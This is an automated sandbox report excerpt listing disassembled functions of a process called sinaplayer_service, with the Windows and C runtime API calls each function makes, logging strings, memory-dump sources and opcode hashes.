                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,00000016,00000000,?,00000000), ref: 00372D2F
                                                                                                                                                                                                      • Part of subcall function 00374790: memset.MSVCR120 ref: 003747B0
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,00000016,?,00000000,00000000), ref: 00372D8F
                                                                                                                                                                                                    • ?SysWideToNativeMB@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?,?,?), ref: 00372DC8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,-00000002,000000FF,?,00000000,00000000), ref: 00372E1C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00000000), ref: 00372E76
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,00000000,00000000), ref: 00372E9D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372EA6
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00000000), ref: 00372ECC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$HttpInfoQueryU?$char_traits@$B@base@@D@2@@std@@D@std@@D@std@@@std@@NativeU?$char_traits@_Unlock@?$basic_streambuf@V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@3@@W@std@@Widememset
                                                                                                                                                                                                    • String ID: `qml
                                                                                                                                                                                                    • API String ID: 2861592337-3674608353
                                                                                                                                                                                                    • Opcode ID: 906b7661e59610714bb86aac9d971f5e880c7e6ccf3f2dbecdb48de5f860a810
                                                                                                                                                                                                    • Instruction ID: 2e9815d0b0e5b68e3209bee242397df0e1a64d9ab0898392c2dce79b1d32eef9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 906b7661e59610714bb86aac9d971f5e880c7e6ccf3f2dbecdb48de5f860a810
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A616DB1900208ABDF26DFA4CC45BEEBBB8FF05314F544129E41ABB2D1DB796944CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(8285FFAB), ref: 0039268C
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003926A2
                                                                                                                                                                                                    • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP120 ref: 003926AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$Pninc@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2538508077-3916222277
                                                                                                                                                                                                    • Opcode ID: 3bf0ba47c18372c2afb80755dc954effea0dfdfbdaafbe59816a78304dab0e5b
                                                                                                                                                                                                    • Instruction ID: 5a19840af75520ed43f0b6559b7ee5e039be9235b95593d70524d5c1d8d3d668
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bf0ba47c18372c2afb80755dc954effea0dfdfbdaafbe59816a78304dab0e5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E51C931A04509EFCF16CFA4C885AEEB7B9FF09320F54452AE512B3691D731A954CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ReadFile.KERNEL32(FFFFFFFF,?,?,?,?,8285FFAB), ref: 0038710D
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0038711B
                                                                                                                                                                                                      • Part of subcall function 00386E90: ??4CallbackBase@internal@base@@QAEAAV012@ABV012@@Z.BASE(?,?,?,?,?,00387206,?,?), ref: 00386EA5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE(?,00387206,?,?), ref: 00386EB5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,00387206,?,?), ref: 00386ECA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@subtle@base@@CountedSafeThread$Base@internal@base@@CallbackErrorFileLastReadRef@Release@V012@V012@@
                                                                                                                                                                                                    • String ID: ReadFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 3731411578-499573692
                                                                                                                                                                                                    • Opcode ID: ef799d8728dc2e7018d779f8201ac7273dc5c27762f1f8ee26910d8ad3a7e129
                                                                                                                                                                                                    • Instruction ID: ead4c477761fd3bb320963543fde9b436b0b07132e7ac446bcb7f6b580b31ff8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef799d8728dc2e7018d779f8201ac7273dc5c27762f1f8ee26910d8ad3a7e129
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE417476A04608AFCF21DF94DC46BDEBBB9FB44720F10466BF915D3690D73699108B50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,?,8285FFAB), ref: 003874E9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003874F7
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 00387536
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,00000089,00000001), ref: 00387553
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,000003E5), ref: 0038757E
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,000003E5), ref: 00387596
                                                                                                                                                                                                      • Part of subcall function 00386E90: ??4CallbackBase@internal@base@@QAEAAV012@ABV012@@Z.BASE(?,?,?,?,?,00387206,?,?), ref: 00386EA5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE(?,00387206,?,?), ref: 00386EB5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,00387206,?,?), ref: 00386ECA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@subtle@base@@CountedMessage@logging@@SafeThread$??6?$basic_ostream@Base@internal@base@@CallbackD@std@@@std@@ErrorFileLastLevel@logging@@Ref@Release@U?$char_traits@V012@V012@@V01@Write
                                                                                                                                                                                                    • String ID: WriteFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,6C57CD86), ref: 6C57CDCA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,6C57CD86), ref: 6C57CDE0
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,?,00000000,?,6C57CD86), ref: 6C57CE00
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000001,?,00000000,?,6C57CD86), ref: 6C57CE11
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000001,00000000,?,00000000,?,6C57CD86), ref: 6C57CE25
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,?,6C57CD86), ref: 6C57CE46
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crtstrlen$freestrcpy_s
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB), ref: 0038A2DD
                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP120 ref: 0038A2F8
                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120 ref: 0038A31E
                                                                                                                                                                                                    • ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?), ref: 0038A33F
                                                                                                                                                                                                    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast), ref: 0038A355
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 0038A364
                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0038A37A
                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP120 ref: 0038A385
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??0bad_cast@std@@??1_Bid@locale@std@@ExceptionFacet_Getcat@?$codecvt@_Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB,00000000,?,00000000,?,?,00000000,0039B459,000000FF,?,003925DF), ref: 00390BED
                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C08
                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C2E
                                                                                                                                                                                                    • ?_Getcat@?$codecvt@DDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,0039B459,?,?,00000000,0039B459), ref: 00390C4F
                                                                                                                                                                                                    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast,?,?,?,?,00000000,0039B459), ref: 00390C65
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 00390C74
                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00390C8A
                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??0bad_cast@std@@??1_Bid@locale@std@@ExceptionFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,8285FFAB), ref: 00387622
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00387630
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 00387644
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,00000097,00000001), ref: 00387661
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?), ref: 00387688
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,?), ref: 003876A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@Message@logging@@V?$basic_streambuf@$??6?$basic_ostream@?setstate@?$basic_ios@_?uncaught_exception@std@@ErrorFileLastLevel@logging@@Osfx@?$basic_ostream@U?$char_traits@_V01@W@std@@@std@@Write
                                                                                                                                                                                                    • String ID: WriteFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,8285FFAB), ref: 00386DC8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00386DD6
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 00386DEA
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,0000004F,00000001), ref: 00386E04
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?), ref: 00386E2B
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 00386E43
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@Message@logging@@V?$basic_streambuf@$??6?$basic_ostream@?setstate@?$basic_ios@_?uncaught_exception@std@@ErrorFileLastLevel@logging@@Osfx@?$basic_ostream@SizeU?$char_traits@_V01@W@std@@@std@@
                                                                                                                                                                                                    • String ID: GetFileSizeEx failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 1284716602-1258412481
                                                                                                                                                                                                    • Opcode ID: 212ce1d042f7dc8117879231a7c224855de085e24b32c99cffd32d732b5277e9
                                                                                                                                                                                                    • Instruction ID: 849c84f35712e5119d38b300edd5550b173975a1b1740d650b5becba76a42c30
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212ce1d042f7dc8117879231a7c224855de085e24b32c99cffd32d732b5277e9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC214475D002089FDB11DFA4DD86BDEBBB8FB08764F10466AE815E3790DB3659448B60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,8285FFAB,?,?), ref: 003873E4
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 003873F2
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE(?,?,?), ref: 00387406
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,000000A2,00000001,?,?,?), ref: 00387423
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?), ref: 0038744A
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,?,?), ref: 00387462
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@Message@logging@@V?$basic_streambuf@$??6?$basic_ostream@?setstate@?$basic_ios@_?uncaught_exception@std@@ErrorFileLastLevel@logging@@Osfx@?$basic_ostream@U?$char_traits@_V01@W@std@@@std@@
                                                                                                                                                                                                    • String ID: SetEndOfFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 3443877305-612808891
                                                                                                                                                                                                    • Opcode ID: dfdfaf3b34888a08bb96c661fb98f4cc8f250aa5d59d44a1737f04245cef8341
                                                                                                                                                                                                    • Instruction ID: 0cfb2e8106e0b9000e75663188a06473a0ac824f7decfa005bc1ace908547957
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfdfaf3b34888a08bb96c661fb98f4cc8f250aa5d59d44a1737f04245cef8341
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6217472A44308AFDB11DF94DC86BDEBBBCFB05750F10466AE915E3390EB3699048B60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000003,00000000,00000004,?,?,?,6C570F30,00000000,00000000,00000000), ref: 6C570D9F
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,?,6C570F30,00000000,00000000,00000000,00000000,?,?), ref: 6C570E14
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,?,00000000,?,00000000,00000000,?,?,?,6C570F30,00000000,00000000,00000000,00000000,?,?), ref: 6C570E31
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,00000400,00000000,?,?,00000000,?,?), ref: 6C570EAD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6C570ED2
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,?,?,?,?,?,?,?), ref: 6C570EDB
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,6C570F30,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6C570EE2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
